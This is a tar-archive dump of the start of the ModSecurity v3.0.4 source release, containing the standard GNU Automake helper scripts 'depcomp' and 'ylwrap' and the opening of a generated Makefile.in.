modsecurity-v3.0.4/0000755000175000017500000000000013607066347014521 5ustar zimmerlezimmerlemodsecurity-v3.0.4/depcomp0000755000175000017500000005602013607066346016100 0ustar zimmerlezimmerle#! /bin/sh # depcomp - compile a program generating dependencies as side-effects scriptversion=2018-03-07.03; # UTC # Copyright (C) 1999-2018 Free Software Foundation, Inc. # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program. If not, see . # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a # configuration script generated by Autoconf, you may include it under # the same distribution terms that you use for the rest of that program. # Originally written by Alexandre Oliva . case $1 in '') echo "$0: No command. Try '$0 --help' for more information." 1>&2 exit 1; ;; -h | --h*) cat <<\EOF Usage: depcomp [--help] [--version] PROGRAM [ARGS] Run PROGRAMS ARGS to compile a file, generating dependencies as side-effects. Environment variables: depmode Dependency tracking mode. source Source file read by 'PROGRAMS ARGS'. object Object file output by 'PROGRAMS ARGS'. DEPDIR directory where to store dependencies. depfile Dependency file to output. tmpdepfile Temporary file to use when outputting dependencies. libtool Whether libtool is used (yes/no). Report bugs to . EOF exit $? ;; -v | --v*) echo "depcomp $scriptversion" exit $? ;; esac # Get the directory component of the given path, and save it in the # global variables '$dir'. Note that this directory component will # be either empty or ending with a '/' character. This is deliberate. set_dir_from () { case $1 in */*) dir=`echo "$1" | sed -e 's|/[^/]*$|/|'`;; *) dir=;; esac } # Get the suffix-stripped basename of the given path, and save it the # global variable '$base'. set_base_from () { base=`echo "$1" | sed -e 's|^.*/||' -e 's/\.[^.]*$//'` } # If no dependency file was actually created by the compiler invocation, # we still have to create a dummy depfile, to avoid errors with the # Makefile "include basename.Plo" scheme. make_dummy_depfile () { echo "#dummy" > "$depfile" } # Factor out some common post-processing of the generated depfile. # Requires the auxiliary global variable '$tmpdepfile' to be set. aix_post_process_depfile () { # If the compiler actually managed to produce a dependency file, # post-process it. if test -f "$tmpdepfile"; then # Each line is of the form 'foo.o: dependency.h'. # Do two passes, one to just change these to # $object: dependency.h # and one to simply output # dependency.h: # which is needed to avoid the deleted-header problem. { sed -e "s,^.*\.[$lower]*:,$object:," < "$tmpdepfile" sed -e "s,^.*\.[$lower]*:[$tab ]*,," -e 's,$,:,' < "$tmpdepfile" } > "$depfile" rm -f "$tmpdepfile" else make_dummy_depfile fi } # A tabulation character. tab=' ' # A newline character. nl=' ' # Character ranges might be problematic outside the C locale. # These definitions help. upper=ABCDEFGHIJKLMNOPQRSTUVWXYZ lower=abcdefghijklmnopqrstuvwxyz digits=0123456789 alpha=${upper}${lower} if test -z "$depmode" || test -z "$source" || test -z "$object"; then echo "depcomp: Variables source, object and depmode must be set" 1>&2 exit 1 fi # Dependencies for sub/bar.o or sub/bar.obj go into sub/.deps/bar.Po. depfile=${depfile-`echo "$object" | sed 's|[^\\/]*$|'${DEPDIR-.deps}'/&|;s|\.\([^.]*\)$|.P\1|;s|Pobj$|Po|'`} tmpdepfile=${tmpdepfile-`echo "$depfile" | sed 's/\.\([^.]*\)$/.T\1/'`} rm -f "$tmpdepfile" # Avoid interferences from the environment. gccflag= dashmflag= # Some modes work just like other modes, but use different flags. We # parameterize here, but still list the modes in the big case below, # to make depend.m4 easier to write. Note that we *cannot* use a case # here, because this file can only contain one case statement. if test "$depmode" = hp; then # HP compiler uses -M and no extra arg. gccflag=-M depmode=gcc fi if test "$depmode" = dashXmstdout; then # This is just like dashmstdout with a different argument. dashmflag=-xM depmode=dashmstdout fi cygpath_u="cygpath -u -f -" if test "$depmode" = msvcmsys; then # This is just like msvisualcpp but w/o cygpath translation. # Just convert the backslash-escaped backslashes to single forward # slashes to satisfy depend.m4 cygpath_u='sed s,\\\\,/,g' depmode=msvisualcpp fi if test "$depmode" = msvc7msys; then # This is just like msvc7 but w/o cygpath translation. # Just convert the backslash-escaped backslashes to single forward # slashes to satisfy depend.m4 cygpath_u='sed s,\\\\,/,g' depmode=msvc7 fi if test "$depmode" = xlc; then # IBM C/C++ Compilers xlc/xlC can output gcc-like dependency information. gccflag=-qmakedep=gcc,-MF depmode=gcc fi case "$depmode" in gcc3) ## gcc 3 implements dependency tracking that does exactly what ## we want. Yay! Note: for some reason libtool 1.4 doesn't like ## it if -MD -MP comes after the -MF stuff. Hmm. ## Unfortunately, FreeBSD c89 acceptance of flags depends upon ## the command line argument order; so add the flags where they ## appear in depend2.am. Note that the slowdown incurred here ## affects only configure: in makefiles, %FASTDEP% shortcuts this. for arg do case $arg in -c) set fnord "$@" -MT "$object" -MD -MP -MF "$tmpdepfile" "$arg" ;; *) set fnord "$@" "$arg" ;; esac shift # fnord shift # $arg done "$@" stat=$? if test $stat -ne 0; then rm -f "$tmpdepfile" exit $stat fi mv "$tmpdepfile" "$depfile" ;; gcc) ## Note that this doesn't just cater to obsosete pre-3.x GCC compilers. ## but also to in-use compilers like IMB xlc/xlC and the HP C compiler. ## (see the conditional assignment to $gccflag above). ## There are various ways to get dependency output from gcc. Here's ## why we pick this rather obscure method: ## - Don't want to use -MD because we'd like the dependencies to end ## up in a subdir. Having to rename by hand is ugly. ## (We might end up doing this anyway to support other compilers.) ## - The DEPENDENCIES_OUTPUT environment variable makes gcc act like ## -MM, not -M (despite what the docs say). Also, it might not be ## supported by the other compilers which use the 'gcc' depmode. ## - Using -M directly means running the compiler twice (even worse ## than renaming). if test -z "$gccflag"; then gccflag=-MD, fi "$@" -Wp,"$gccflag$tmpdepfile" stat=$? if test $stat -ne 0; then rm -f "$tmpdepfile" exit $stat fi rm -f "$depfile" echo "$object : \\" > "$depfile" # The second -e expression handles DOS-style file names with drive # letters. sed -e 's/^[^:]*: / /' \ -e 's/^['$alpha']:\/[^:]*: / /' < "$tmpdepfile" >> "$depfile" ## This next piece of magic avoids the "deleted header file" problem. ## The problem is that when a header file which appears in a .P file ## is deleted, the dependency causes make to die (because there is ## typically no way to rebuild the header). We avoid this by adding ## dummy dependencies for each header file. Too bad gcc doesn't do ## this for us directly. ## Some versions of gcc put a space before the ':'. On the theory ## that the space means something, we add a space to the output as ## well. hp depmode also adds that space, but also prefixes the VPATH ## to the object. Take care to not repeat it in the output. ## Some versions of the HPUX 10.20 sed can't process this invocation ## correctly. Breaking it into two sed invocations is a workaround. tr ' ' "$nl" < "$tmpdepfile" \ | sed -e 's/^\\$//' -e '/^$/d' -e "s|.*$object$||" -e '/:$/d' \ | sed -e 's/$/ :/' >> "$depfile" rm -f "$tmpdepfile" ;; hp) # This case exists only to let depend.m4 do its work. It works by # looking at the text of this script. This case will never be run, # since it is checked for above. exit 1 ;; sgi) if test "$libtool" = yes; then "$@" "-Wp,-MDupdate,$tmpdepfile" else "$@" -MDupdate "$tmpdepfile" fi stat=$? if test $stat -ne 0; then rm -f "$tmpdepfile" exit $stat fi rm -f "$depfile" if test -f "$tmpdepfile"; then # yes, the sourcefile depend on other files echo "$object : \\" > "$depfile" # Clip off the initial element (the dependent). Don't try to be # clever and replace this with sed code, as IRIX sed won't handle # lines with more than a fixed number of characters (4096 in # IRIX 6.2 sed, 8192 in IRIX 6.5). We also remove comment lines; # the IRIX cc adds comments like '#:fec' to the end of the # dependency line. tr ' ' "$nl" < "$tmpdepfile" \ | sed -e 's/^.*\.o://' -e 's/#.*$//' -e '/^$/ d' \ | tr "$nl" ' ' >> "$depfile" echo >> "$depfile" # The second pass generates a dummy entry for each header file. tr ' ' "$nl" < "$tmpdepfile" \ | sed -e 's/^.*\.o://' -e 's/#.*$//' -e '/^$/ d' -e 's/$/:/' \ >> "$depfile" else make_dummy_depfile fi rm -f "$tmpdepfile" ;; xlc) # This case exists only to let depend.m4 do its work. It works by # looking at the text of this script. This case will never be run, # since it is checked for above. exit 1 ;; aix) # The C for AIX Compiler uses -M and outputs the dependencies # in a .u file. In older versions, this file always lives in the # current directory. Also, the AIX compiler puts '$object:' at the # start of each line; $object doesn't have directory information. # Version 6 uses the directory in both cases. set_dir_from "$object" set_base_from "$object" if test "$libtool" = yes; then tmpdepfile1=$dir$base.u tmpdepfile2=$base.u tmpdepfile3=$dir.libs/$base.u "$@" -Wc,-M else tmpdepfile1=$dir$base.u tmpdepfile2=$dir$base.u tmpdepfile3=$dir$base.u "$@" -M fi stat=$? if test $stat -ne 0; then rm -f "$tmpdepfile1" "$tmpdepfile2" "$tmpdepfile3" exit $stat fi for tmpdepfile in "$tmpdepfile1" "$tmpdepfile2" "$tmpdepfile3" do test -f "$tmpdepfile" && break done aix_post_process_depfile ;; tcc) # tcc (Tiny C Compiler) understand '-MD -MF file' since version 0.9.26 # FIXME: That version still under development at the moment of writing. # Make that this statement remains true also for stable, released # versions. # It will wrap lines (doesn't matter whether long or short) with a # trailing '\', as in: # # foo.o : \ # foo.c \ # foo.h \ # # It will put a trailing '\' even on the last line, and will use leading # spaces rather than leading tabs (at least since its commit 0394caf7 # "Emit spaces for -MD"). "$@" -MD -MF "$tmpdepfile" stat=$? if test $stat -ne 0; then rm -f "$tmpdepfile" exit $stat fi rm -f "$depfile" # Each non-empty line is of the form 'foo.o : \' or ' dep.h \'. # We have to change lines of the first kind to '$object: \'. sed -e "s|.*:|$object :|" < "$tmpdepfile" > "$depfile" # And for each line of the second kind, we have to emit a 'dep.h:' # dummy dependency, to avoid the deleted-header problem. sed -n -e 's|^ *\(.*\) *\\$|\1:|p' < "$tmpdepfile" >> "$depfile" rm -f "$tmpdepfile" ;; ## The order of this option in the case statement is important, since the ## shell code in configure will try each of these formats in the order ## listed in this file. A plain '-MD' option would be understood by many ## compilers, so we must ensure this comes after the gcc and icc options. pgcc) # Portland's C compiler understands '-MD'. # Will always output deps to 'file.d' where file is the root name of the # source file under compilation, even if file resides in a subdirectory. # The object file name does not affect the name of the '.d' file. # pgcc 10.2 will output # foo.o: sub/foo.c sub/foo.h # and will wrap long lines using '\' : # foo.o: sub/foo.c ... \ # sub/foo.h ... \ # ... set_dir_from "$object" # Use the source, not the object, to determine the base name, since # that's sadly what pgcc will do too. set_base_from "$source" tmpdepfile=$base.d # For projects that build the same source file twice into different object # files, the pgcc approach of using the *source* file root name can cause # problems in parallel builds. Use a locking strategy to avoid stomping on # the same $tmpdepfile. lockdir=$base.d-lock trap " echo '$0: caught signal, cleaning up...' >&2 rmdir '$lockdir' exit 1 " 1 2 13 15 numtries=100 i=$numtries while test $i -gt 0; do # mkdir is a portable test-and-set. if mkdir "$lockdir" 2>/dev/null; then # This process acquired the lock. "$@" -MD stat=$? # Release the lock. rmdir "$lockdir" break else # If the lock is being held by a different process, wait # until the winning process is done or we timeout. while test -d "$lockdir" && test $i -gt 0; do sleep 1 i=`expr $i - 1` done fi i=`expr $i - 1` done trap - 1 2 13 15 if test $i -le 0; then echo "$0: failed to acquire lock after $numtries attempts" >&2 echo "$0: check lockdir '$lockdir'" >&2 exit 1 fi if test $stat -ne 0; then rm -f "$tmpdepfile" exit $stat fi rm -f "$depfile" # Each line is of the form `foo.o: dependent.h', # or `foo.o: dep1.h dep2.h \', or ` dep3.h dep4.h \'. # Do two passes, one to just change these to # `$object: dependent.h' and one to simply `dependent.h:'. sed "s,^[^:]*:,$object :," < "$tmpdepfile" > "$depfile" # Some versions of the HPUX 10.20 sed can't process this invocation # correctly. Breaking it into two sed invocations is a workaround. sed 's,^[^:]*: \(.*\)$,\1,;s/^\\$//;/^$/d;/:$/d' < "$tmpdepfile" \ | sed -e 's/$/ :/' >> "$depfile" rm -f "$tmpdepfile" ;; hp2) # The "hp" stanza above does not work with aCC (C++) and HP's ia64 # compilers, which have integrated preprocessors. The correct option # to use with these is +Maked; it writes dependencies to a file named # 'foo.d', which lands next to the object file, wherever that # happens to be. # Much of this is similar to the tru64 case; see comments there. set_dir_from "$object" set_base_from "$object" if test "$libtool" = yes; then tmpdepfile1=$dir$base.d tmpdepfile2=$dir.libs/$base.d "$@" -Wc,+Maked else tmpdepfile1=$dir$base.d tmpdepfile2=$dir$base.d "$@" +Maked fi stat=$? if test $stat -ne 0; then rm -f "$tmpdepfile1" "$tmpdepfile2" exit $stat fi for tmpdepfile in "$tmpdepfile1" "$tmpdepfile2" do test -f "$tmpdepfile" && break done if test -f "$tmpdepfile"; then sed -e "s,^.*\.[$lower]*:,$object:," "$tmpdepfile" > "$depfile" # Add 'dependent.h:' lines. sed -ne '2,${ s/^ *// s/ \\*$// s/$/:/ p }' "$tmpdepfile" >> "$depfile" else make_dummy_depfile fi rm -f "$tmpdepfile" "$tmpdepfile2" ;; tru64) # The Tru64 compiler uses -MD to generate dependencies as a side # effect. 'cc -MD -o foo.o ...' puts the dependencies into 'foo.o.d'. # At least on Alpha/Redhat 6.1, Compaq CCC V6.2-504 seems to put # dependencies in 'foo.d' instead, so we check for that too. # Subdirectories are respected. set_dir_from "$object" set_base_from "$object" if test "$libtool" = yes; then # Libtool generates 2 separate objects for the 2 libraries. These # two compilations output dependencies in $dir.libs/$base.o.d and # in $dir$base.o.d. We have to check for both files, because # one of the two compilations can be disabled. We should prefer # $dir$base.o.d over $dir.libs/$base.o.d because the latter is # automatically cleaned when .libs/ is deleted, while ignoring # the former would cause a distcleancheck panic. tmpdepfile1=$dir$base.o.d # libtool 1.5 tmpdepfile2=$dir.libs/$base.o.d # Likewise. tmpdepfile3=$dir.libs/$base.d # Compaq CCC V6.2-504 "$@" -Wc,-MD else tmpdepfile1=$dir$base.d tmpdepfile2=$dir$base.d tmpdepfile3=$dir$base.d "$@" -MD fi stat=$? if test $stat -ne 0; then rm -f "$tmpdepfile1" "$tmpdepfile2" "$tmpdepfile3" exit $stat fi for tmpdepfile in "$tmpdepfile1" "$tmpdepfile2" "$tmpdepfile3" do test -f "$tmpdepfile" && break done # Same post-processing that is required for AIX mode. aix_post_process_depfile ;; msvc7) if test "$libtool" = yes; then showIncludes=-Wc,-showIncludes else showIncludes=-showIncludes fi "$@" $showIncludes > "$tmpdepfile" stat=$? grep -v '^Note: including file: ' "$tmpdepfile" if test $stat -ne 0; then rm -f "$tmpdepfile" exit $stat fi rm -f "$depfile" echo "$object : \\" > "$depfile" # The first sed program below extracts the file names and escapes # backslashes for cygpath. The second sed program outputs the file # name when reading, but also accumulates all include files in the # hold buffer in order to output them again at the end. This only # works with sed implementations that can handle large buffers. sed < "$tmpdepfile" -n ' /^Note: including file: *\(.*\)/ { s//\1/ s/\\/\\\\/g p }' | $cygpath_u | sort -u | sed -n ' s/ /\\ /g s/\(.*\)/'"$tab"'\1 \\/p s/.\(.*\) \\/\1:/ H $ { s/.*/'"$tab"'/ G p }' >> "$depfile" echo >> "$depfile" # make sure the fragment doesn't end with a backslash rm -f "$tmpdepfile" ;; msvc7msys) # This case exists only to let depend.m4 do its work. It works by # looking at the text of this script. This case will never be run, # since it is checked for above. exit 1 ;; #nosideeffect) # This comment above is used by automake to tell side-effect # dependency tracking mechanisms from slower ones. dashmstdout) # Important note: in order to support this mode, a compiler *must* # always write the preprocessed file to stdout, regardless of -o. "$@" || exit $? # Remove the call to Libtool. if test "$libtool" = yes; then while test "X$1" != 'X--mode=compile'; do shift done shift fi # Remove '-o $object'. IFS=" " for arg do case $arg in -o) shift ;; $object) shift ;; *) set fnord "$@" "$arg" shift # fnord shift # $arg ;; esac done test -z "$dashmflag" && dashmflag=-M # Require at least two characters before searching for ':' # in the target name. This is to cope with DOS-style filenames: # a dependency such as 'c:/foo/bar' could be seen as target 'c' otherwise. "$@" $dashmflag | sed "s|^[$tab ]*[^:$tab ][^:][^:]*:[$tab ]*|$object: |" > "$tmpdepfile" rm -f "$depfile" cat < "$tmpdepfile" > "$depfile" # Some versions of the HPUX 10.20 sed can't process this sed invocation # correctly. Breaking it into two sed invocations is a workaround. tr ' ' "$nl" < "$tmpdepfile" \ | sed -e 's/^\\$//' -e '/^$/d' -e '/:$/d' \ | sed -e 's/$/ :/' >> "$depfile" rm -f "$tmpdepfile" ;; dashXmstdout) # This case only exists to satisfy depend.m4. It is never actually # run, as this mode is specially recognized in the preamble. exit 1 ;; makedepend) "$@" || exit $? # Remove any Libtool call if test "$libtool" = yes; then while test "X$1" != 'X--mode=compile'; do shift done shift fi # X makedepend shift cleared=no eat=no for arg do case $cleared in no) set ""; shift cleared=yes ;; esac if test $eat = yes; then eat=no continue fi case "$arg" in -D*|-I*) set fnord "$@" "$arg"; shift ;; # Strip any option that makedepend may not understand. Remove # the object too, otherwise makedepend will parse it as a source file. -arch) eat=yes ;; -*|$object) ;; *) set fnord "$@" "$arg"; shift ;; esac done obj_suffix=`echo "$object" | sed 's/^.*\././'` touch "$tmpdepfile" ${MAKEDEPEND-makedepend} -o"$obj_suffix" -f"$tmpdepfile" "$@" rm -f "$depfile" # makedepend may prepend the VPATH from the source file name to the object. # No need to regex-escape $object, excess matching of '.' is harmless. sed "s|^.*\($object *:\)|\1|" "$tmpdepfile" > "$depfile" # Some versions of the HPUX 10.20 sed can't process the last invocation # correctly. Breaking it into two sed invocations is a workaround. sed '1,2d' "$tmpdepfile" \ | tr ' ' "$nl" \ | sed -e 's/^\\$//' -e '/^$/d' -e '/:$/d' \ | sed -e 's/$/ :/' >> "$depfile" rm -f "$tmpdepfile" "$tmpdepfile".bak ;; cpp) # Important note: in order to support this mode, a compiler *must* # always write the preprocessed file to stdout. "$@" || exit $? # Remove the call to Libtool. if test "$libtool" = yes; then while test "X$1" != 'X--mode=compile'; do shift done shift fi # Remove '-o $object'. IFS=" " for arg do case $arg in -o) shift ;; $object) shift ;; *) set fnord "$@" "$arg" shift # fnord shift # $arg ;; esac done "$@" -E \ | sed -n -e '/^# [0-9][0-9]* "\([^"]*\)".*/ s:: \1 \\:p' \ -e '/^#line [0-9][0-9]* "\([^"]*\)".*/ s:: \1 \\:p' \ | sed '$ s: \\$::' > "$tmpdepfile" rm -f "$depfile" echo "$object : \\" > "$depfile" cat < "$tmpdepfile" >> "$depfile" sed < "$tmpdepfile" '/^$/d;s/^ //;s/ \\$//;s/$/ :/' >> "$depfile" rm -f "$tmpdepfile" ;; msvisualcpp) # Important note: in order to support this mode, a compiler *must* # always write the preprocessed file to stdout. "$@" || exit $? # Remove the call to Libtool. if test "$libtool" = yes; then while test "X$1" != 'X--mode=compile'; do shift done shift fi IFS=" " for arg do case "$arg" in -o) shift ;; $object) shift ;; "-Gm"|"/Gm"|"-Gi"|"/Gi"|"-ZI"|"/ZI") set fnord "$@" shift shift ;; *) set fnord "$@" "$arg" shift shift ;; esac done "$@" -E 2>/dev/null | sed -n '/^#line [0-9][0-9]* "\([^"]*\)"/ s::\1:p' | $cygpath_u | sort -u > "$tmpdepfile" rm -f "$depfile" echo "$object : \\" > "$depfile" sed < "$tmpdepfile" -n -e 's% %\\ %g' -e '/^\(.*\)$/ s::'"$tab"'\1 \\:p' >> "$depfile" echo "$tab" >> "$depfile" sed < "$tmpdepfile" -n -e 's% %\\ %g' -e '/^\(.*\)$/ s::\1\::p' >> "$depfile" rm -f "$tmpdepfile" ;; msvcmsys) # This case exists only to let depend.m4 do its work. It works by # looking at the text of this script. This case will never be run, # since it is checked for above. exit 1 ;; none) exec "$@" ;; *) echo "Unknown depmode $depmode" 1>&2 exit 1 ;; esac exit 0 # Local Variables: # mode: shell-script # sh-indentation: 2 # eval: (add-hook 'before-save-hook 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" # time-stamp-time-zone: "UTC0" # time-stamp-end: "; # UTC" # End: modsecurity-v3.0.4/ylwrap0000755000175000017500000001531413607066346015770 0ustar zimmerlezimmerle#! /bin/sh # ylwrap - wrapper for lex/yacc invocations. scriptversion=2018-03-07.03; # UTC # Copyright (C) 1996-2018 Free Software Foundation, Inc. # # Written by Tom Tromey . # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a # configuration script generated by Autoconf, you may include it under # the same distribution terms that you use for the rest of that program. # This file is maintained in Automake, please report # bugs to or send patches to # . get_dirname () { case $1 in */*|*\\*) printf '%s\n' "$1" | sed -e 's|\([\\/]\)[^\\/]*$|\1|';; # Otherwise, we want the empty string (not "."). esac } # guard FILE # ---------- # The CPP macro used to guard inclusion of FILE. guard () { printf '%s\n' "$1" \ | sed \ -e 'y/abcdefghijklmnopqrstuvwxyz/ABCDEFGHIJKLMNOPQRSTUVWXYZ/' \ -e 's/[^ABCDEFGHIJKLMNOPQRSTUVWXYZ]/_/g' \ -e 's/__*/_/g' } # quote_for_sed [STRING] # ---------------------- # Return STRING (or stdin) quoted to be used as a sed pattern. quote_for_sed () { case $# in 0) cat;; 1) printf '%s\n' "$1";; esac \ | sed -e 's|[][\\.*]|\\&|g' } case "$1" in '') echo "$0: No files given. Try '$0 --help' for more information." 1>&2 exit 1 ;; --basedir) basedir=$2 shift 2 ;; -h|--h*) cat <<\EOF Usage: ylwrap [--help|--version] INPUT [OUTPUT DESIRED]... -- PROGRAM [ARGS]... Wrapper for lex/yacc invocations, renaming files as desired. INPUT is the input file OUTPUT is one file PROG generates DESIRED is the file we actually want instead of OUTPUT PROGRAM is program to run ARGS are passed to PROG Any number of OUTPUT,DESIRED pairs may be used. Report bugs to . EOF exit $? ;; -v|--v*) echo "ylwrap $scriptversion" exit $? ;; esac # The input. input=$1 shift # We'll later need for a correct munging of "#line" directives. input_sub_rx=`get_dirname "$input" | quote_for_sed` case $input in [\\/]* | ?:[\\/]*) # Absolute path; do nothing. ;; *) # Relative path. Make it absolute. input=`pwd`/$input ;; esac input_rx=`get_dirname "$input" | quote_for_sed` # Since DOS filename conventions don't allow two dots, # the DOS version of Bison writes out y_tab.c instead of y.tab.c # and y_tab.h instead of y.tab.h. Test to see if this is the case. y_tab_nodot=false if test -f y_tab.c || test -f y_tab.h; then y_tab_nodot=true fi # The parser itself, the first file, is the destination of the .y.c # rule in the Makefile. parser=$1 # A sed program to s/FROM/TO/g for all the FROM/TO so that, for # instance, we rename #include "y.tab.h" into #include "parse.h" # during the conversion from y.tab.c to parse.c. sed_fix_filenames= # Also rename header guards, as Bison 2.7 for instance uses its header # guard in its implementation file. sed_fix_header_guards= while test $# -ne 0; do if test x"$1" = x"--"; then shift break fi from=$1 # Handle y_tab.c and y_tab.h output by DOS if $y_tab_nodot; then case $from in "y.tab.c") from=y_tab.c;; "y.tab.h") from=y_tab.h;; esac fi shift to=$1 shift sed_fix_filenames="${sed_fix_filenames}s|"`quote_for_sed "$from"`"|$to|g;" sed_fix_header_guards="${sed_fix_header_guards}s|"`guard "$from"`"|"`guard "$to"`"|g;" done # The program to run. prog=$1 shift # Make any relative path in $prog absolute. case $prog in [\\/]* | ?:[\\/]*) ;; *[\\/]*) prog=`pwd`/$prog ;; esac dirname=ylwrap$$ do_exit="cd '`pwd`' && rm -rf $dirname > /dev/null 2>&1;"' (exit $ret); exit $ret' trap "ret=129; $do_exit" 1 trap "ret=130; $do_exit" 2 trap "ret=141; $do_exit" 13 trap "ret=143; $do_exit" 15 mkdir $dirname || exit 1 cd $dirname case $# in 0) "$prog" "$input" ;; *) "$prog" "$@" "$input" ;; esac ret=$? if test $ret -eq 0; then for from in * do to=`printf '%s\n' "$from" | sed "$sed_fix_filenames"` if test -f "$from"; then # If $2 is an absolute path name, then just use that, # otherwise prepend '../'. case $to in [\\/]* | ?:[\\/]*) target=$to;; *) target=../$to;; esac # Do not overwrite unchanged header files to avoid useless # recompilations. Always update the parser itself: it is the # destination of the .y.c rule in the Makefile. Divert the # output of all other files to a temporary file so we can # compare them to existing versions. if test $from != $parser; then realtarget=$target target=tmp-`printf '%s\n' "$target" | sed 's|.*[\\/]||g'` fi # Munge "#line" or "#" directives. Don't let the resulting # debug information point at an absolute srcdir. Use the real # output file name, not yy.lex.c for instance. Adjust the # include guards too. sed -e "/^#/!b" \ -e "s|$input_rx|$input_sub_rx|" \ -e "$sed_fix_filenames" \ -e "$sed_fix_header_guards" \ "$from" >"$target" || ret=$? # Check whether files must be updated. if test "$from" != "$parser"; then if test -f "$realtarget" && cmp -s "$realtarget" "$target"; then echo "$to is unchanged" rm -f "$target" else echo "updating $to" mv -f "$target" "$realtarget" fi fi else # A missing file is only an error for the parser. This is a # blatant hack to let us support using "yacc -d". If -d is not # specified, don't fail when the header file is "missing". if test "$from" = "$parser"; then ret=1 fi fi done fi # Remove the directory. cd .. rm -rf $dirname exit $ret # Local Variables: # mode: shell-script # sh-indentation: 2 # eval: (add-hook 'before-save-hook 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" # time-stamp-time-zone: "UTC0" # time-stamp-end: "; # UTC" # End: modsecurity-v3.0.4/Makefile.in0000644000175000017500000052175213607066346016601 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ subdir = . ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(top_srcdir)/configure \ $(am__configure_deps) $(am__DIST_COMMON) am__CONFIG_DISTCLEAN_FILES = config.status config.cache config.log \ configure.lineno config.status.lineno mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = modsecurity.pc CONFIG_CLEAN_VPATH_FILES = AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = SOURCES = DIST_SOURCES = 